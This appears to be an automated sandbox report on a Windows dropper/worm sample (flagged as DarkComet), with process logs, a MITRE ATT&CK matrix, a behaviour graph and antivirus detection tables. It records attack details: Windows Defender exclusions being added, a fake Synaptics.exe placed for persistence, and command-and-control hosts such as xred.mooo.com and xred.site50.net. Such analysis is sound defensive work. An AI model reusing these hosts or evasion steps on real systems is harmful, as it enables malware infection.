                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0040B2D4 GetLocalTime,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0047E020 GetTimeZoneInformation,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00472E58 GetUserNameA,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00446564 GetVersion,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: cmd.exe /C
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: cmd.exe /C
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: cmd.exe /C
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0047C7BC bind,

                                Mitre Att&ck Matrix

                                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                                1
                                Replication Through Removable Media                                		1
                                Native API                                		1
                                DLL Side-Loading                                		1
                                Exploitation for Privilege Escalation                                		1
                                Disable or Modify Tools                                		11
                                Input Capture                                		2
                                System Time Discovery                                		1
                                Replication Through Removable Media                                		1
                                Archive Collected Data                                		Exfiltration Over Other Network Medium4
                                Ingress Tool Transfer                                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                                System Shutdown/Reboot
                                Default Accounts1
                                Command and Scripting Interpreter                                		1
                                Windows Service                                		1
                                DLL Side-Loading                                		1
                                Deobfuscate/Decode Files or Information                                		LSASS Memory1
                                Peripheral Device Discovery                                		Remote Desktop Protocol1
                                Screen Capture                                		Exfiltration Over Bluetooth11
                                Encrypted Channel                                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                                Domain AccountsAt (Linux)Logon Script (Windows)1
                                Access Token Manipulation                                		2
                                Obfuscated Files or Information                                		Security Account Manager1
                                Account Discovery                                		SMB/Windows Admin Shares11
                                Input Capture                                		Automated Exfiltration3
                                Non-Application Layer Protocol                                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                                Local AccountsAt (Windows)Logon Script (Mac)1
                                Windows Service                                		1
                                Software Packing                                		NTDS4
                                File and Directory Discovery                                		Distributed Component Object Model2
                                Clipboard Data                                		Scheduled Transfer24
                                Application Layer Protocol                                		SIM Card SwapCarrier Billing Fraud
                                Cloud AccountsCronNetwork Logon Script11
                                Process Injection                                		1
                                DLL Side-Loading                                		LSA Secrets136
                                System Information Discovery                                		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                                Replication Through Removable MediaLaunchdRc.commonRc.common111
                                Masquerading                                		Cached Domain Credentials1
                                Query Registry                                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                                External Remote ServicesScheduled TaskStartup ItemsStartup Items31
                                Virtualization/Sandbox Evasion                                		DCSync23
                                Security Software Discovery                                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                                Access Token Manipulation                                		Proc Filesystem1
                                Process Discovery                                		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)11
                                Process Injection                                		/etc/passwd and /etc/shadow31
                                Virtualization/Sandbox Evasion                                		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing11
                                Application Window Discovery                                		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                                Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture1
                                System Owner/User Discovery                                		Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                                Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeylogging1
                                Remote System Discovery                                		Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 signatures2 2 Behavior Graph ID: 634939 Sample: SecuriteInfo.com.Variant.Fa... Startdate: 27/05/2022 Architecture: WINDOWS Score: 100 69 Snort IDS alert for network traffic 2->69 71 Found malware configuration 2->71 73 Antivirus detection for URL or domain 2->73 75 8 other signatures 2->75 9 SecuriteInfo.com.Variant.FakeAlert.2.24488.exe 1 2->9         started        13 Synaptics.exe 2->13         started        15 EXCEL.EXE 2->15         started        process3 file4 61 C:\Users\user\AppData\...\uniformerede.exe, PE32 9->61 dropped 95 Antivirus detection for dropped file 9->95 97 Machine Learning detection for dropped file 9->97 99 Adds a directory exclusion to Windows Defender 9->99 17 cmd.exe 1 9->17         started        19 cmd.exe 1 9->19         started        signatures5 process6 signatures7 22 uniformerede.exe 1 5 17->22         started        26 conhost.exe 17->26         started        77 Adds a directory exclusion to Windows Defender 19->77 28 powershell.exe 25 19->28         started        30 powershell.exe 24 19->30         started        32 conhost.exe 19->32         started        process8 file9 55 C:\ProgramData\Synaptics\Synaptics.exe, PE32 22->55 dropped 57 C:\ProgramData\Synaptics\RCXCD96.tmp, PE32 22->57 dropped 59 C:\Users\user\...\._cache_uniformerede.exe, PE32 22->59 dropped 89 Antivirus detection for dropped file 22->89 91 Machine Learning detection for dropped file 22->91 93 Contains functionality to detect sleep reduction / modifications 22->93 34 Synaptics.exe 51 22->34         started        39 ._cache_uniformerede.exe 6 29 22->39         started        signatures10 process11 dnsIp12 63 docs.google.com 172.217.168.14, 443, 49736, 49737 GOOGLEUS United States 34->63 65 freedns.afraid.org 69.42.215.252, 49739, 80 AWKNET-LLCUS United States 34->65 67 xred.mooo.com 34->67 45 C:\Users\user\Documents\DUUDTUBZFW\~$cache1, PE32 34->45 dropped 47 SecuriteInfo.com.V...keAlert.2.24488.exe, PE32 34->47 dropped 49 C:\Users\user\AppData\Local\...\YC9w8Aif.exe, PE32 34->49 dropped 53 2 other malicious files 34->53 dropped 79 Antivirus detection for dropped file 34->79 81 Drops PE files to the document folder of the user 34->81 83 Machine Learning detection for dropped file 34->83 85 Contains functionality to detect sleep reduction / modifications 34->85 41 WerFault.exe 34->41         started        43 WerFault.exe 34->43         started        51 C:\Users\user\AppData\Local\...\System.dll, PE32 39->51 dropped 87 Tries to detect virtualization through RDTSC time measurements 39->87 file13 signatures14 process15

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                SecuriteInfo.com.Variant.FakeAlert.2.24488.exe62%VirustotalBrowse
                                SecuriteInfo.com.Variant.FakeAlert.2.24488.exe59%ReversingLabsWin32.Backdoor.DarkComet
                                SecuriteInfo.com.Variant.FakeAlert.2.24488.exe100%AviraTR/Dropper.Gen

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Local\Temp\uniformerede.exe100%AviraWORM/Dldr.Agent.gqrxn
                                C:\Users\user\AppData\Local\Temp\uniformerede.exe100%AviraW2000M/Dldr.Agent.17651006
                                C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe100%AviraWORM/Dldr.Agent.gqrxn
                                C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe100%AviraTR/Dropper.Gen
                                C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe100%AviraW2000M/Dldr.Agent.17651006
                                C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe100%AviraWORM/Dldr.Agent.gqrxn
                                C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe100%AviraW2000M/Dldr.Agent.17651006
                                C:\Users\user\Documents\DUUDTUBZFW\~$cache1100%AviraWORM/Dldr.Agent.gqrxn
                                C:\Users\user\Documents\DUUDTUBZFW\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                                C:\Users\user\AppData\Local\Temp\RCXF979.tmp100%AviraWORM/Dldr.Agent.gqrxn
                                C:\Users\user\AppData\Local\Temp\RCXF979.tmp100%AviraTR/Dropper.Gen
                                C:\Users\user\AppData\Local\Temp\RCXF979.tmp100%AviraW2000M/Dldr.Agent.17651006
                                C:\ProgramData\Synaptics\RCXCD96.tmp100%AviraWORM/Dldr.Agent.gqrxn
                                C:\ProgramData\Synaptics\RCXCD96.tmp100%AviraW2000M/Dldr.Agent.17651006
                                C:\ProgramData\Synaptics\Synaptics.exe100%AviraWORM/Dldr.Agent.gqrxn
                                C:\ProgramData\Synaptics\Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
                                C:\Users\user\AppData\Local\Temp\RCXDA77.tmp100%AviraWORM/Dldr.Agent.gqrxn
                                C:\Users\user\AppData\Local\Temp\RCXDA77.tmp100%AviraTR/Dropper.Gen
                                C:\Users\user\AppData\Local\Temp\RCXDA77.tmp100%AviraW2000M/Dldr.Agent.17651006
                                C:\Users\user\AppData\Local\Temp\uniformerede.exe100%Joe Sandbox ML
                                C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe100%Joe Sandbox ML
                                C:\Users\user\Documents\DUUDTUBZFW\~$cache1100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\RCXF979.tmp100%Joe Sandbox ML
                                C:\ProgramData\Synaptics\RCXCD96.tmp100%Joe Sandbox ML
                                C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\RCXDA77.tmp100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll3%MetadefenderBrowse
                                C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll0%ReversingLabs

                                Unpacked PE Files

                                SourceDetectionScannerLabelLinkDownload
                                0.2.SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
                                9.0.Synaptics.exe.400000.4.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
                                9.0.Synaptics.exe.400000.4.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
                                12.2.Synaptics.exe.400000.0.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
                                12.2.Synaptics.exe.400000.0.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
                                9.2.Synaptics.exe.400000.0.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
                                9.2.Synaptics.exe.400000.0.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
                                6.0.uniformerede.exe.4b8e14.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                                0.0.SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
                                6.2.uniformerede.exe.400000.0.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
                                6.2.uniformerede.exe.400000.0.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
                                9.0.Synaptics.exe.400000.2.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
                                9.0.Synaptics.exe.400000.2.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
                                0.2.SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.a07634.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                                9.0.Synaptics.exe.400000.0.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
                                9.0.Synaptics.exe.400000.0.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
                                6.2.uniformerede.exe.4b8e14.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                                6.0.uniformerede.exe.400000.0.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
                                6.0.uniformerede.exe.400000.0.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
                                12.0.Synaptics.exe.400000.0.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
                                12.0.Synaptics.exe.400000.0.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
                                9.0.Synaptics.exe.400000.3.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
                                9.0.Synaptics.exe.400000.3.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
                                9.0.Synaptics.exe.400000.1.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
                                9.0.Synaptics.exe.400000.1.unpack100%AviraW2000M/Dldr.Agent.17651006Download File

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                http://xred.site50.net/syn/SSLLibrary.dlX0%Avira URL Cloudsafe
                                https://roaming.edog.0%URL Reputationsafe
                                https://cdn.entity.0%URL Reputationsafe
                                https://powerlift.acompli.net0%URL Reputationsafe
                                https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                                https://cortana.ai0%URL Reputationsafe
                                https://api.aadrm.com/0%URL Reputationsafe
                                https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
                                http://xred.site50.net/syn/SUpdate.iniZ0%Avira URL Cloudsafe
                                http://xred.site50.net/syn/SUpdate.ini3%VirustotalBrowse
                                http://xred.site50.net/syn/SUpdate.ini0%Avira URL Cloudsafe
                                https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
                                https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                                https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
                                https://officeci.azurewebsites.net/api/0%URL Reputationsafe
                                https://store.office.cn/addinstemplate0%URL Reputationsafe
